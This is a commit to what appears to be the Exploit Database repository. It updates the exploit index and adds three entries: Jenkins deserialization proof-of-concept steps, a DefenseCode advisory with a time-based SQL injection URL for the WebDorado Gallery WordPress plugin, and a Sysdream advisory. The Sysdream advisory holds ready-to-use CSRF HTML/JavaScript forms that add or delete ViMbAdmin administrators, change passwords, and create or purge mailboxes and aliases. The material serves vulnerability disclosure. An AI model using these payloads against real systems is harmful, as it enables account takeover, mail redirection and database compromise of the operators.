DB: 2017-05-06

3 new exploits CloudBees Jenkins 2.32.1 - Java Deserialization Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99) FOSS Gallery Public 1.0 - Arbitrary File Upload 1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99) 1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99) ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion C99Shell 1.0 Pre-Release build 16 - 'Ch99.php' Cross-Site Scripting C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting C99.php Shell - Authentication Bypass C99 Shell - 'c99.php' Authentication Bypass WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery
2017-05-06 05:01:18 +00:00 · 2017-05-06 05:01:18 +00:00 · 64159294a8
commit 64159294a8
parent 8f3ada9286
4 changed files with 410 additions and 6 deletions
--- a/files.csv
+++ b/files.csv
@ -5483,6 +5483,7 @@ id,file,description,date,author,platform,type,port
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
 41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
 41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15482,7 +15483,7 @@ id,file,description,date,author,platform,type,port
 41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
 41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
-41964,platforms/macos/remote/41964.html,"Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
+41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -19937,7 +19938,7 @@ id,file,description,date,author,platform,type,port
 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0
 6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0
 6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
-6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0
+6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,JosS,php,webapps,0
 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
 6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0
@ -20936,7 +20937,7 @@ id,file,description,date,author,platform,type,port
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
-8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
+8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
@ -20975,7 +20976,7 @@ id,file,description,date,author,platform,type,port
 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0
-8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
+8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion",2009-02-13,bd0rk,php,webapps,0
 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
@ -33487,7 +33488,7 @@ id,file,description,date,author,platform,type,port
 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0
 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection",2010-05-11,"High-Tech Bridge SA",php,webapps,0
 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0
-33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'Ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
+33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0
 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0
 33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0
@ -33517,7 +33518,7 @@ id,file,description,date,author,platform,type,port
 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
 34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0
 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0
-34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
+34025,platforms/php/webapps/34025.txt,"C99 Shell - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,php,webapps,0
 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
 34032,platforms/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps,0
@ -37813,3 +37814,5 @@ id,file,description,date,author,platform,type,port
 41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
 41962,platforms/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",linux,webapps,0
 41963,platforms/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps,0
 41966,platforms/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,php,webapps,80
 41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
--- a/platforms/java/dos/41965.txt
+++ b/platforms/java/dos/41965.txt
@ -0,0 +1,25 @@
 Source: https://blogs.securiteam.com/index.php/archives/3171
 Vulnerability Details
 Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.
 The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.
 The first request starts a session for the bi-directional channel and is used for “downloading” data from the server. The HTTP header “Session” is the identifier for the channel. The HTTP header “Side” specifies the “downloading/uploading” direction.
 The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “Session” HTTP header which is just a UUID.
 Proof of Concept
 In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.
 The second step is to change python script jenkins_poc1.py:
 - Adjust target url in URL variable
 - Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41965.zip
--- a/platforms/php/webapps/41966.txt
+++ b/platforms/php/webapps/41966.txt
@ -0,0 +1,103 @@
 Source: http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
 DefenseCode ThunderScan SAST Advisory
 WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability
 Advisory ID: DC-2017-02-011
 Software: WordPress WebDorado Gallery Plugin
 Software Language: PHP
 Version: 1.3.29 and below
 Vendor Status: Vendor contacted, vulnerability confirmed
 Release Date: 20170502
 Risk: Medium
 1. General Overview
 During the security audit, multiple security vulnerabilities were discovered in WordPress
 WebDorado Gallery Plugin using DefenseCode ThunderScan application source code security
 analysis platform.
 More information about ThunderScan is available at URL:
 http://www.defensecode.com
 2. Software Overview
 According to the plugin developers, WebDorado, Gallery plugin is a fully responsive
 WordPress gallery plugin with advanced functionality that is easy to customize and has
 various views. It has more than 300,000 downloads on wordpress.org.
 Homepage:
 https://wordpress.org/plugins/photo-gallery/
 https://web-dorado.com/products/wordpress-photo-gallery-plugin.html
 http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
 3. Vulnerability Description
 During the security analysis, ThunderScan discovered SQL injection vulnerability in WebDorado
 Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided
 URL while being logged in as administrator or another user that is authorized to access the
 plugin settings page. Any user with such privileges can obtain the valid bwg_nonce value by
 previously visiting the settings page. Users that to do not have full administrative privileges
 could abuse the database access the vulnerability provides to either escalate their privileges
 or obtain and modify database contents they were not supposed to be able to.
 3.1 SQL injection
 Function: $wpdb->get_col($query)
 Variable: $_GET['album_id']
 Sample URL:
 http://server/wp-admin/adminajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))
 )VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1
 File: photo-gallery\admin\models\BWGModelAddAlbumsGalleries.php
 26 $album_id = ((isset($_GET['album_id'])) ? esc_html(stripslashes($_GET['album_id'])) :
 ((isset($_POST['album_id'])) ? esc_html(stripslashes($_POST['album_id'])) : ''));
 ...
 28 $page_nav = $this->model->page_nav($album_id);
 File: photo-gallery\admin\views\BWGViewAddAlbumsGalleries.php
 41 public function page_nav($album_id) {
 ...
 44 $query = "SELECT id FROM " . $wpdb->prefix . "bwg_album WHERE published=1 AND id<>" .
 $album_id . " " . $where . " UNION ALL SELECT id FROM " . $wpdb->prefix . "bwg_gallery WHERE
 published=1 " . $where;
 45 $total = count($wpdb->get_col($query));
 4. Solution
 Vendor resolved the security issues in one of the subsequent releases. All users are strongly
 advised to update WordPress WebDorado Gallery plugin to the latest available version. Version
 1.3.38 no longer seems to be vulnerable.
 5. Credits
 Discovered by Neven Biruski with DefenseCode ThunderScan source code security analyzer.
 6. Disclosure Timeline
 20170404 Vendor contacted
 20170405 Vendor responded: “Thanks for noticing and told us about this, we will
 take into account and will fix the issues with upcoming update.”
 ? Update released
 20170502 Latest plugin version tested. Vulnerability seems fixed.
 Advisory released to the public.
 http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
 7. About DefenseCode
 DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop
 and mobile applications for security vulnerabilities.
 DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing)
 solution for performing extensive security audits of application source code. ThunderScan
 performs fast and accurate analyses of large and complex source code projects delivering
 precise results and low false positive rate.
 DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing)
 solution for comprehensive security audits of active web applications. WebScanner will test a
 website's security by carrying out a large number of attacks using the most advanced
 techniques, just as a real attacker would.
 Subscribe for free software trial on our website http://www.defensecode.com
 E-mail: defensecode[at]defensecode.com
 Website: http://www.defensecode.com
 Twitter: https://twitter.com/DefenseCode/
--- a/platforms/php/webapps/41967.txt
+++ b/platforms/php/webapps/41967.txt
@ -0,0 +1,273 @@
 # [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15
 ## Product Description
 ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.
 ## Details
 **CVE ID**: CVE-2017-6086
 **Access Vector**: remote
 **Security Risk**: high
 **Vulnerability**: CWE-352
 **CVSS Base Score**: 8.8
 **CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
 ## Proof of concept
 ### Add administrator user
 #### Exploit
 The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
 <input type="text" name="user" value="target@email" >
 <input type="text" name="password" value="newpassword" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
 ### Remove administrator user
 #### Exploit
 The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
 ### Change administrator password
 #### Exploit
 The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
 <input type="text" name="password" value="newpassword" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
 ### Add mailbox address
 #### Exploit
 The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
 <input type="text" name="local_part" value="<fakeemail>" >
 <input type="text" name="domain" value="<domain id>" >
 <input type="text" name="name" value="<fake name>" >
 <input type="text" name="password" value="<password>" >
 <input type="text" name="quota" value="0" >
 <input type="text" name="alt_email" value="" >
 <input type="text" name="cc_welcome_email" value="" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
 ### Purge mailbox
 #### Exploit
 The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
 <input type="text" name="data" value="purge" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
 ### Archive mailbox
 #### Exploit
 The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.
 ### Add alias address
 #### Exploit
 The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.
 ```html
 curl 'http://<ip>/alias/add/did/<domain id>'  --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
 <input type="text" name="local_part" value="<fake mailbox>" >
 <input type="text" name="domain" value="<domain id>" >
 <input type="text" name="goto[]" value="<redirection email address>" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable code
 The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
 ### Remove alias address
 #### Exploit
 The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
 ```html
 <head>
 <title>CSRF ViMbAdmin</title>
 </head>
 <body>
 <iframe style="display:none" name="csrf-frame"></iframe>
 <form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
 </form>
 <script>document.getElementById("csrf-form").submit()</script>
 </body>
 ```
 #### Vulnerable Code
 The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
 ## Affected version
 * tested on version 3.0.15
 ## Timeline (dd/mm/yyyy)
 * 22/01/2017 : Initial discovery.
 * 16/02/2017 : First contact with opensolutions.io
 * 16/02/2017 : Advisory sent.
 * 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
 * 13/03/2017 : Sysdream Labs request for an update.
 * 29/03/2017 : Second request for an update.
 * 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
 * 03/05/2017 : Full disclosure.
 ## Credits
 * Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)